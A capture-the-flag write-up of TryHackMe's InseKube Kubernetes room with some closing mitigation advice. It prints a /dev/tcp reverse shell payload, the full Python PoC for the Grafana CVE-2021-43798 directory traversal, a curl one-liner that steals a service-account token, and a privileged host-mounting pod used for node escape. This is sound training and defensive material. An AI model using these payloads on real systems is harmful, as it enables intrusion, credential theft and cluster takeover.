Exploiting Kubernetes through a Grafana LFI vulnerability 👨🔬🔎💉

Category

Cloud-Security, Kubernetes Security, LFI vulnerability

Introduction



Securing a Kubernetes cluster is a monumental task. There are a lot of things that need to be considered to properly secure and harden the different components within a cluster. Luckily, there is a simple guide to securing Kubernetes in the context of Cloud Native Security that builds on the defense-in-depth approach to security, which is widely regarded as a best practice for securing software systems.

Each layer of the Cloud Native security model builds upon the next outermost layer. The Code layer benefits from strong base (Cloud, Cluster, Container) security layers. You cannot safeguard against poor security standards in the base layers by addressing security at the Code level.

Simply put, security in the cloud native context can be thought of as four layers, the 4Cs:

- Cloud - Following the security best practices of your cloud provider (AWS, Azure, GCP): network security, RBAC on cloud resources, etc.

- Cluster - There are 2 key areas:

  - Securing the cluster (https://kubernetes.io/docs/tasks/administer-cluster/securing-a-cluster/)

  - Securing cluster components (applications within the cluster: service account RBAC, app secrets management, pod security, network and TLS)

- Container - Scanning container image builds for vulnerable OS dependencies, plus image signing and enforcement.

- Code - Your typical code security using SAST (static code analysis) and DAST (dynamic analysis of the running application).

In this writeup, we will focus on cluster application component and container configuration security by going through TryHackMe’s InseKube room. For more details, and for securing the other components, check out the Kubernetes documentation.

Vulnerabilities found on the Kubernetes cluster

We are given a minikube cluster to enumerate, and we have to work our way in by finding vulnerabilities and misconfigurations within it. We will start with a simple nmap scan.

Vulnerable web endpoint

nmap scan

sudo nmap -sC -sV -O -p- -Pn 10.10.151.225

Password:

Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-24 08:50 +08

Stats: 0:08:40 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan

Service scan Timing: About 50.00% done; ETC: 09:00 (0:01:12 remaining)

Nmap scan report for 10.10.151.225

Host is up (0.18s latency).

Not shown: 65533 closed tcp ports (reset)

PORT STATE SERVICE VERSION

22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)

| ssh-hostkey:

| 3072 9f:ae:04:9e:f0:75:ed:b7:39:80:a0:d8:7f:bd:61:06 (RSA)

| 256 cf:cb:89:62:99:11:d7:ca:cd:5b:57:78:10:d0:6c:82 (ECDSA)

|_ 256 5f:11:10:0d:7c:80:a3:fc:d1:d5:43:4e:49:f9:c8:d2 (ED25519)

80/tcp open http

|_http-title: Site doesn't have a title (text/html; charset=utf-8).

| fingerprint-strings:

| GetRequest:

| HTTP/1.1 200 OK

| Date: Thu, 24 Feb 2022 00:57:42 GMT

| Content-Type: text/html; charset=utf-8

| Content-Length: 1196

| Connection: close

| <!DOCTYPE html>

| <head>

| <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css"

| integrity="sha384-JcKb8q3iqJ61gNV9KGb8thSsNjpSL0n8PARn9HuZOnIxN0hoP+VmmDGMN5t9UJ0Z" crossorigin="anonymous">

| <style>

| body,

| html {

| height: 100%;

| </style>

| </head>

| <body>

| <div class="container h-100">

| <div class="row mt-5">

| <div class="col-12 mb-4">

| class="text-center">Check if a website is down

| </h3>

| </div>

| <form class="col-6 mx-auto" action="/">

| <div class=" input-group">

| <input name="hostname" value="" type="text" class="form-control" placeholder="Hostname"

| HTTPOptions, RTSPRequest:

| HTTP/1.1 405 Method Not Allowed

| Date: Thu, 24 Feb 2022 00:57:43 GMT

| Content-Type: text/plain; charset=utf-8

| Content-Length: 18

| Allow: GET, HEAD

| Connection: close

|_ Method Not Allowed

Network Distance: 2 hops

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 572.71 seconds

From the scan we can see that 2 ports are open: SSH (22) and HTTP (80). Visiting the web page shows a text field that takes a hostname. The field is vulnerable to injection: shell commands submitted through it are executed on the target (command injection).

From here we can get a reverse shell using a payload from https://revshells.com. On your attack machine:

nc -lvnp 4444

On the target host

sh -i >& /dev/tcp/[attackmachineip]/4444 0>&1

Interacting with kubernetes

Once we have a reverse shell, we can start enumerating by interacting with Kubernetes. To do that, we need to download the kubectl binary into the /tmp directory and make it executable.

cd /tmp; curl -LO "https://dl.k8s.io/release/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl"; chmod +x kubectl

Before going further, check the environment variables of the web account for anything useful. ;)

env

KUBERNETES_SERVICE_PORT_HTTPS=443

GRAFANA_SERVICE_HOST=10.10.151.225

KUBERNETES_SERVICE_PORT=443

HOSTNAME=syringe-79b66d66d7-7mxhd

SYRINGE_PORT=tcp://10.99.16.179:3000

GRAFANA_PORT=tcp://10.10.151.225:3000

SYRINGE_SERVICE_HOST=10.99.16.179

SYRINGE_PORT_3000_TCP=tcp://10.99.16.179:3000

GRAFANA_PORT_3000_TCP=tcp://10.10.151.225:3000

PWD=/home/challenge

SYRINGE_PORT_3000_TCP_PROTO=tcp

HOME=/home/challenge

KUBERNETES_PORT_443_TCP=tcp://10.96.0.1:443

GOLANG_VERSION=1.15.7

FLAG=flag{Redacted}

SHLVL=1

SYRINGE_PORT_3000_TCP_PORT=3000

GRAFANA_PORT_3000_TCP_PORT=3000

KUBERNETES_PORT_443_TCP_PROTO=tcp

KUBERNETES_PORT_443_TCP_ADDR=10.96.0.1

GRAFANA_SERVICE_PORT=3000

SYRINGE_PORT_3000_TCP_ADDR=10.99.16.179

SYRINGE_SERVICE_PORT=3000

KUBERNETES_SERVICE_HOST=10.96.0.1

KUBERNETES_PORT=tcp://10.96.0.1:443

KUBERNETES_PORT_443_TCP_PORT=443

GRAFANA_PORT_3000_TCP_PROTO=tcp

PATH=/usr/local/go/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

GRAFANA_PORT_3000_TCP_ADDR=10.10.151.225

_=/usr/bin/env

From the environment variables above, we can see that there is a Grafana service running inside the cluster on port 3000. It was not exposed to the public, which is why the previous nmap scan did not show it.
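Kubernetes injects a `<NAME>_SERVICE_HOST` and `<NAME>_SERVICE_PORT` pair for each Service visible to the pod, which is what makes the listing above useful for discovery. As a minimal sketch, assuming Python is available wherever you analyse the dump, the pairs can be pulled out like this. The function name `services_from_env` is hypothetical and only used for illustration.

```python
import re

# Matches the <NAME>_SERVICE_HOST variables that Kubernetes injects per Service.
SERVICE_HOST_RE = re.compile(r"^([A-Z0-9_]+)_SERVICE_HOST$")


def services_from_env(env):
    """Return {service_name: (host, port)} from a mapping of environment variables."""
    services = {}
    for key, host in env.items():
        match = SERVICE_HOST_RE.match(key)
        if not match:
            continue
        name = match.group(1)
        # The matching <NAME>_SERVICE_PORT variable carries the port, if present.
        port = env.get(f"{name}_SERVICE_PORT")
        services[name.lower()] = (host, int(port) if port else None)
    return services
```

Calling `services_from_env(dict(os.environ))` inside the pod (after `import os`) would list the same Grafana, Syringe and Kubernetes endpoints that we picked out by eye.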

Once the kubectl binary is downloaded, we can check which permissions the web application's service account has.

./kubectl auth can-i --list

Resources Non-Resource URLs Resource Names Verbs

selfsubjectaccessreviews.authorization.k8s.io [] [] [create]

selfsubjectrulesreviews.authorization.k8s.io [] [] [create]

secrets [] [] [get list]

[/.well-known/openid-configuration] [] [get]

[/api/*] [] [get]

[/api] [] [get]

[/apis/*] [] [get]

[/apis] [] [get]

[/healthz] [] [get]

[/healthz] [] [get]

[/livez] [] [get]

[/livez] [] [get]

[/openapi/*] [] [get]

[/openapi] [] [get]

[/openid/v1/jwks] [] [get]

[/readyz] [] [get]

[/readyz] [] [get]

[/version/] [] [get]

[/version/] [] [get]

[/version] [] [get]

[/version] []

Kubernetes stores secret values in resources called Secrets, which get mounted into pods either as environment variables or as files. Since our account is allowed to get and list secrets, we can view them using ./kubectl get secrets

NAME TYPE DATA AGE

default-token-8bksk kubernetes.io/service-account-token 3 41d

developer-token-74lck kubernetes.io/service-account-token 3 41d

secretflag Opaque 1 41d

syringe-token-g85mg kubernetes.io/service-account-token 3 41d

Notice that the type of secretflag is Opaque, which is the default type for arbitrary user-defined data. kubectl describe does not print the values of a secret, only their size in bytes.

To view the details of a particular secret:

cd /tmp; ./kubectl describe secret secretflag

Name: secretflag

Namespace: default

Labels: <none>

Annotations: <none>

Type: Opaque

Data

====

flag: 38 bytes

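To view the raw data of the secret, use kubectl get secret secretflag -o 'json'. The values under data are base64-encoded, not encrypted, so they can be decoded with base64 -d.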

{

"apiVersion": "v1",

"data": {

"flag": "ZmxhZ3tkZjJhNjM2ZGUxNTEwOGE0ZGM0MTEzNWQ5MzBkOGVjMX0="

},

"kind": "Secret",

"metadata": {

"annotations": {

"kubectl.kubernetes.io/last-applied-configuration": "{\"apiVersion\":\"v1\",\"data\":{\"flag\":\"ZmxhZ3tkZjJhNjM2ZGUxNTEwOGE0ZGM0MTEzNWQ5MzBkOGVjMX0=\"},\"kind\":\"Secret\",\"metadata\":{\"annotations\":{},\"name\":\"secretflag\",\"namespace\":\"default\"},\"type\":\"Opaque\"}\n"

},

"creationTimestamp": "2022-01-06T23:41:19Z",

"name": "secretflag",

"namespace": "default",

"resourceVersion": "562",

"uid": "6384b135-4628-4693-b269-4e50bfffdf21"

},

"type": "Opaque"

}

echo "ZmxhZ3tkZjJhNjM2ZGUxNTEwOGE0ZGM0MTEzNWQ5MzBkOGVjMX0=" | base64 -d

flag{Redacted}
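When a secret holds several keys, decoding them one at a time gets tedious. The following is a minimal sketch, assuming the JSON output of kubectl has been saved or piped somewhere Python can read it. The helper name `decode_secret_data` and the sample value are made up for illustration and are not the real flag.

```python
import base64
import json


def decode_secret_data(secret_json):
    """Decode every base64 value under the "data" key of a Secret manifest."""
    secret = json.loads(secret_json)
    return {
        key: base64.b64decode(value).decode("utf-8")
        for key, value in secret.get("data", {}).items()
    }


# Hypothetical sample, not the real flag: the value decodes to "example-value".
sample = '{"kind": "Secret", "data": {"flag": "ZXhhbXBsZS12YWx1ZQ=="}}'
print(decode_secret_data(sample))
```

This only shows that base64 is an encoding rather than protection: anyone who can get a Secret can read its content.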

Once we’re done enumerating kubernetes, we can start enumerating the internal grafana service as below.

Enumerating grafana for lateral movement

curl http://grafana:3000

% Total % Received % Xferd Average Speed Time Time Time Current

Dload Upload Total Spent Left Speed

0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0

100 29 100 29 0 0 7250 0 --:--:-- --:--:-- --:--:-- 7250

<a href="/login">Found</a>.

The request is redirected to a /login endpoint. Grafana can be enumerated further to find the version running on the cluster and to search for any CVEs.

Sure enough, Grafana v8.3.0-beta2 is affected by CVE-2021-43798, and a PoC script is available on Exploit-DB. Using this vulnerability, we will be able to extract the JWT of the service account that the Grafana pod runs as.

Kubernetes mounts the token of the service account running a pod at /var/run/secrets/kubernetes.io/serviceaccount/token

An LFI payload that combines the internal Grafana URL with the token path above can be sent to the Grafana service to extract the token.

# Exploit Title: Grafana 8.3.0 - Directory Traversal and Arbitrary File Read
# Date: 08/12/2021
# Exploit Author: s1gh
# Vendor Homepage: https://grafana.com/
# Vulnerability Details: https://github.com/grafana/grafana/security/advisories/GHSA-8pjx-jj86-j47p
# Version: V8.0.0-beta1 through V8.3.0
# Description: Grafana versions 8.0.0-beta1 through 8.3.0 is vulnerable to directory traversal, allowing access to local files.
# CVE: CVE-2021-43798
# Tested on: Debian 10
# References: https://github.com/grafana/grafana/security/advisories/GHSA-8pjx-jj86-j47p

#!/usr/bin/env python3
# -*- coding: utf-8 -*-

import requests
import argparse
import sys
from random import choice

# Plugin IDs bundled with Grafana; any one of them can anchor the traversal.
plugin_list = [
    "alertlist",
    "annolist",
    "barchart",
    "bargauge",
    "candlestick",
    "cloudwatch",
    "dashlist",
    "elasticsearch",
    "gauge",
    "geomap",
    "gettingstarted",
    "grafana-azure-monitor-datasource",
    "graph",
    "heatmap",
    "histogram",
    "influxdb",
    "jaeger",
    "logs",
    "loki",
    "mssql",
    "mysql",
    "news",
    "nodeGraph",
    "opentsdb",
    "piechart",
    "pluginlist",
    "postgres",
    "prometheus",
    "stackdriver",
    "stat",
    "state-timeline",
    "status-history",
    "table",
    "table-old",
    "tempo",
    "testdata",
    "text",
    "timeseries",
    "welcome",
    "zipkin"
]


def exploit(args):
    s = requests.Session()
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.'}

    while True:
        file_to_read = input('Read file > ')

        try:
            url = args.host + '/public/plugins/' + \
                choice(plugin_list) + \
                '/../../../../../../../../../../../../..' + file_to_read
            req = requests.Request(method='GET', url=url, headers=headers)
            prep = req.prepare()
            # Overwrite the prepared URL so the "../" segments are sent as-is.
            prep.url = url
            r = s.send(prep, verify=False, timeout=3)

            if 'Plugin file not found' in r.text:
                print('[-] File not found\n')
            else:
                if r.status_code == 200:
                    print(r.text)
                else:
                    print('[-] Something went wrong.')
                    return
        except requests.exceptions.ConnectTimeout:
            print('[-] Request timed out. Please check your host settings.\n')
            return
        except Exception:
            pass


def main():
    parser = argparse.ArgumentParser(
        description="Grafana V8.0.0-beta1 - 8.3.0 - Directory Traversal and Arbitrary File Read")
    parser.add_argument('-H', dest='host', required=True, help="Target host")
    args = parser.parse_args()

    try:
        exploit(args)
    except KeyboardInterrupt:
        return


if __name__ == '__main__':
    main()
    sys.exit(0)

From the PoC exploit, we can see that the LFI payload can be crafted as below against the /public/plugins/ endpoint. This reads the token (in JWT format) of the service account that the Grafana pod runs as, which turns out to have escalated privileges.

curl --path-as-is http://grafana:3000/public/plugins/alertlist/../../../../../../../../../../../../../var/run/secrets/kubernetes.io/serviceaccount/token
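The structure of that URL is simple: a valid plugin ID, a run of `..` segments long enough to climb out of the plugin directory, then the absolute path of the file. A minimal sketch of the construction follows. The helper name `build_traversal_url` is hypothetical, and the default depth of 13 is an assumption meant to mirror the PoC; any value at least as deep as the plugin directory should behave the same, because extra `..` segments at the root have no effect.

```python
def build_traversal_url(base_url, plugin, target_path, depth=13):
    """Build a CVE-2021-43798 style URL: plugin path, '..' segments, then the file."""
    if not target_path.startswith("/"):
        raise ValueError("target_path must be absolute")
    traversal = "/".join([".."] * depth)
    return f"{base_url.rstrip('/')}/public/plugins/{plugin}/{traversal}{target_path}"


print(build_traversal_url("http://grafana:3000", "alertlist", "/etc/passwd", depth=2))
```

Building the string is the easy part. Many HTTP clients normalize `..` segments before sending, which is why curl needs --path-as-is and why the PoC overwrites `prep.url` after preparing the request.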

As the shell is not too stable, the token is saved into an environment variable as below.

export token=$(curl --path-as-is http://grafana:3000/public/plugins/alertlist/../../../../../../../../../../../../../var/run/secrets/kubernetes.io/serviceaccount/token)

We can now interact with Kubernetes as a more privileged service account.

./kubectl auth can-i --list --token=${token}

Resources Non-Resource URLs Resource Names Verbs

*.* [] [] [*]

[*] [] [*]

selfsubjectaccessreviews.authorization.k8s.io [] [] [create]

selfsubjectrulesreviews.authorization.k8s.io [] [] [create]

[/.well-known/openid-configuration] [] [get]

[/api/*] [] [get]

[/api] [] [get]

[/apis/*] [] [get]

[/apis] [] [get]

[/healthz] [] [get]

[/healthz] [] [get]

[/livez] [] [get]

[/livez] [] [get]

[/openapi/*] [] [get]

[/openapi] [] [get]

[/openid/v1/jwks] [] [get]

[/readyz] [] [get]

[/readyz] [] [get]

[/version/] [] [get]

[/version/] [] [get]

[/version] [] [get]

[/version] [] [get]

Listing the pods shows that there is a grafana pod running. With the token we got earlier, we should be able to exec into that pod and check for any sensitive data we can use to escalate further.

./kubectl get pods --token=${token}

NAME READY STATUS RESTARTS AGE

grafana-57454c95cb-v4nrk 1/1 Running 10 (25d ago) 49d

syringe-79b66d66d7-7mxhd 1/1 Running 1 (25d ago) 25d

The service account we’re using is developer.

./kubectl get serviceaccount --token=${token}

NAME SECRETS AGE

default 1 49d

developer 1 49d

syringe 1 49d
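The listing shows which service accounts exist, but not which one a token belongs to. A service account token is a JWT, so its payload can be decoded without any key to read the claims. The sketch below assumes the token string is available in Python. The function name `jwt_claims` is hypothetical, and the signature is deliberately not verified because we only want to inspect the claims.

```python
import base64
import json


def jwt_claims(token):
    """Return the decoded payload of a JWT without verifying its signature."""
    parts = token.strip().split(".")
    if len(parts) != 3:
        raise ValueError("expected header.payload.signature")
    payload = parts[1]
    # JWT segments are base64url without padding; restore it before decoding.
    payload += "=" * (-len(payload) % 4)
    return json.loads(base64.urlsafe_b64decode(payload))
```

For a Kubernetes service account token, the `sub` claim has the form `system:serviceaccount:<namespace>:<name>`, so `jwt_claims(token)["sub"]` is a quick way to check the identity behind the stolen token.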

Breaking into grafana pod and looking at environment variables. ;)

./kubectl exec -it grafana-57454c95cb-v4nrk --token=${token} -- /bin/bash

hostname

grafana-57454c95cb-v4nrk

env

KUBERNETES_SERVICE_PORT_HTTPS=443

GRAFANA_SERVICE_HOST=10.10.151.225

KUBERNETES_SERVICE_PORT=443

HOSTNAME=grafana-57454c95cb-v4nrk

SYRINGE_PORT=tcp://10.99.16.179:3000

GRAFANA_PORT=tcp://10.10.151.225:3000

SYRINGE_SERVICE_HOST=10.99.16.179

SYRINGE_PORT_3000_TCP=tcp://10.99.16.179:3000

GRAFANA_PORT_3000_TCP=tcp://10.10.151.225:3000

PWD=/usr/share/grafana

GF_PATHS_HOME=/usr/share/grafana

SYRINGE_PORT_3000_TCP_PROTO=tcp

HOME=/home/grafana

KUBERNETES_PORT_443_TCP=tcp://10.96.0.1:443

FLAG=flag{redacted}

SHLVL=1

SYRINGE_PORT_3000_TCP_PORT=3000

GF_PATHS_PROVISIONING=/etc/grafana/provisioning

GRAFANA_PORT_3000_TCP_PORT=3000

KUBERNETES_PORT_443_TCP_PROTO=tcp

KUBERNETES_PORT_443_TCP_ADDR=10.96.0.1

GRAFANA_SERVICE_PORT=3000

SYRINGE_PORT_3000_TCP_ADDR=10.99.16.179

SYRINGE_SERVICE_PORT=3000

GF_PATHS_DATA=/var/lib/grafana

KUBERNETES_SERVICE_HOST=10.96.0.1

KUBERNETES_PORT=tcp://10.96.0.1:443

KUBERNETES_PORT_443_TCP_PORT=443

GF_PATHS_LOGS=/var/log/grafana

GRAFANA_PORT_3000_TCP_PROTO=tcp

PATH=/usr/share/grafana/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

GF_PATHS_PLUGINS=/var/lib/grafana/plugins

GRAFANA_PORT_3000_TCP_ADDR=10.10.151.225

GF_PATHS_CONFIG=/etc/grafana/grafana.ini

_=/usr/bin/env

Escalating to the node with bad pod

Having admin access to the cluster allows a user to create any resource at will. The Bishop Fox article on bad pods (https://bishopfox.com/blog/kubernetes-pod-privilege-escalation) explains how to get access to the Kubernetes nodes by running a pod that mounts the node’s file system.

A bad pod can be created from the YAML file below. Note that the cluster might not have internet connectivity, so set imagePullPolicy: IfNotPresent to make Kubernetes use an image that is already present on the node instead of pulling it.

apiVersion: v1
kind: Pod
metadata:
  name: everything-allowed-exec-pod
  labels:
    app: pentest
spec:
  hostNetwork: true
  hostPID: true
  hostIPC: true
  containers:
  - name: everything-allowed-pod
    image: ubuntu
    imagePullPolicy: IfNotPresent
    securityContext:
      privileged: true
    volumeMounts:
    - mountPath: /host
      name: noderoot
    command: [ "/bin/sh", "-c", "--" ]
    args: [ "while true; do sleep 30; done;" ]
  #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name
  volumes:
  - name: noderoot
    hostPath:
      path: /

cat <<EOF >>privesc.yml
apiVersion: v1
kind: Pod
metadata:
  name: everything-allowed-exec-pod
  labels:
    app: pentest
spec:
  hostNetwork: true
  hostPID: true
  hostIPC: true
  containers:
  - name: everything-allowed-pod
    image: ubuntu
    imagePullPolicy: IfNotPresent
    securityContext:
      privileged: true
    volumeMounts:
    - mountPath: /host
      name: noderoot
    command: [ "/bin/sh", "-c", "--" ]
    args: [ "while true; do sleep 30; done;" ]
  #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name
  volumes:
  - name: noderoot
    hostPath:
      path: /
EOF

./kubectl apply -f privesc.yml --token=${token}

./kubectl exec -it everything-allowed-exec-pod --token=${token} -- /bin/bash

find . -name "root.txt"

find: File system loop detected; './host/sys/fs/cgroup/pids/docker/8b3aa3e54588c392fb08435e932ed905ad3080307c7d5dcb53fd024673de5f9e' is part of the same file system loop as './host/sys/fs/cgroup/pids'.

find: File system loop detected; './host/sys/fs/cgroup/perf_event/docker/8b3aa3e54588c392fb08435e932ed905ad3080307c7d5dcb53fd024673de5f9e' is part of the same file system loop as './host/sys/fs/cgroup/perf_event'.

find: File system loop detected; './host/sys/fs/cgroup/memory/docker/8b3aa3e54588c392fb08435e932ed905ad3080307c7d5dcb53fd024673de5f9e' is part of the same file system loop as './host/sys/fs/cgroup/memory'.

find: File system loop detected; './host/sys/fs/cgroup/cpuset/docker/8b3aa3e54588c392fb08435e932ed905ad3080307c7d5dcb53fd024673de5f9e' is part of the same file system loop as './host/sys/fs/cgroup/cpuset'.

find: File system loop detected; './host/sys/fs/cgroup/net_cls,net_prio/docker/8b3aa3e54588c392fb08435e932ed905ad3080307c7d5dcb53fd024673de5f9e' is part of the same file system loop as './host/sys/fs/cgroup/net_cls,net_prio'.

find: File system loop detected; './host/sys/fs/cgroup/freezer/docker/8b3aa3e54588c392fb08435e932ed905ad3080307c7d5dcb53fd024673de5f9e' is part of the same file system loop as './host/sys/fs/cgroup/freezer'.

find: File system loop detected; './host/sys/fs/cgroup/blkio/docker/8b3aa3e54588c392fb08435e932ed905ad3080307c7d5dcb53fd024673de5f9e' is part of the same file system loop as './host/sys/fs/cgroup/blkio'.

find: File system loop detected; './host/sys/fs/cgroup/hugetlb/docker/8b3aa3e54588c392fb08435e932ed905ad3080307c7d5dcb53fd024673de5f9e' is part of the same file system loop as './host/sys/fs/cgroup/hugetlb'.

find: File system loop detected; './host/sys/fs/cgroup/cpu,cpuacct/docker/8b3aa3e54588c392fb08435e932ed905ad3080307c7d5dcb53fd024673de5f9e' is part of the same file system loop as './host/sys/fs/cgroup/cpu,cpuacct'.

find: File system loop detected; './host/sys/fs/cgroup/devices/docker/8b3aa3e54588c392fb08435e932ed905ad3080307c7d5dcb53fd024673de5f9e' is part of the same file system loop as './host/sys/fs/cgroup/devices'.

find: File system loop detected; './host/sys/fs/cgroup/systemd/docker/8b3aa3e54588c392fb08435e932ed905ad3080307c7d5dcb53fd024673de5f9e' is part of the same file system loop as './host/sys/fs/cgroup/systemd'.

find: File system loop detected; './host/var/lib/docker/overlay2/7f3ea4e7c6e133fafbdf9883b717a65f552dda89b37e0e86be3a072532c5feeb/merged' is part of the same file system loop as '.'.

./host/root/root.txt

The root flag turns up in the search results, and the cluster is pwned. But what is the point of all this if, as a blue teamer, you do not know how to mitigate these attacks to protect your organization or business?

Defending against LFI on your web service (Application Security)

To eliminate the risk of LFI attacks, the recommended approach is to never pass user-submitted input to any filesystem or framework API in your application. If that isn’t possible, you need to sanitize all such inputs. The following article documents the mitigation methods in detail:

https://www.pivotpointsecurity.com/blog/file-inclusion-vulnerabilities/
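One common form of that sanitization is to resolve the requested path and refuse anything that ends up outside an allowed base directory. The following is a minimal sketch of the idea, not Grafana's actual fix. The function name `safe_resolve` and the example base directory are assumptions made for illustration.

```python
import os


def safe_resolve(base_dir, user_path):
    """Resolve user_path under base_dir, rejecting anything that escapes it."""
    base = os.path.realpath(base_dir)
    # lstrip keeps an absolute user path from replacing base in os.path.join.
    candidate = os.path.realpath(os.path.join(base, user_path.lstrip("/")))
    # After resolving ".." and symlinks, the result must still sit under base.
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError("path escapes the allowed directory")
    return candidate
```

With a hypothetical base of `/srv/app/public`, a request for `img/logo.png` resolves normally, while `../../etc/passwd` raises `ValueError` instead of reaching the file system.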

Defending against lateral movements and privilege escalation from pod to node (Cluster component security)

To defend against lateral movement and privilege escalation, the services and dependencies running within the cluster need to be constantly monitored for CVEs using vulnerability scanners such as kube-hunter and the Snyk Container scanner.
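Scanning for CVEs does not catch the bad pod itself, since that manifest contains no vulnerable software, only dangerous settings. As a rough sketch of what reviewing a manifest for those settings could look like, the function below flags the fields the bad pod relied on. The name `risky_pod_settings` is hypothetical, the manifest is assumed to be already parsed into a dict, and this is an illustration rather than a substitute for enforcing pod security at admission time.

```python
def risky_pod_settings(pod):
    """List settings in a Pod manifest (as a dict) that ease escape to the node."""
    spec = pod.get("spec", {})
    # Host namespaces shared with the node.
    findings = [flag for flag in ("hostNetwork", "hostPID", "hostIPC") if spec.get(flag)]
    for container in spec.get("containers", []):
        if (container.get("securityContext") or {}).get("privileged"):
            findings.append(f"privileged container: {container.get('name')}")
    # hostPath volumes expose the node's file system to the pod.
    for volume in spec.get("volumes", []):
        if "hostPath" in volume:
            findings.append(f"hostPath volume: {volume['hostPath'].get('path')}")
    return findings
```

Run against the everything-allowed pod used earlier, it reports all three host namespaces, the privileged container and the hostPath mount of `/`.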

Conclusion

Thank you for reading. Do note that this writeup only covered a small subset of the Cluster, Container and Application security components of Kubernetes, and there are a lot more parts that need to be secured. Here are the sources mentioned in the writeup.

https://tryhackme.com/room/insekube

https://bishopfox.com/blog/kubernetes-pod-privilege-escalation

https://docs.snyk.io/products/snyk-container/getting-started-snyk-container

https://kube-hunter.aquasec.com

https://www.pivotpointsecurity.com/blog/file-inclusion-vulnerabilities/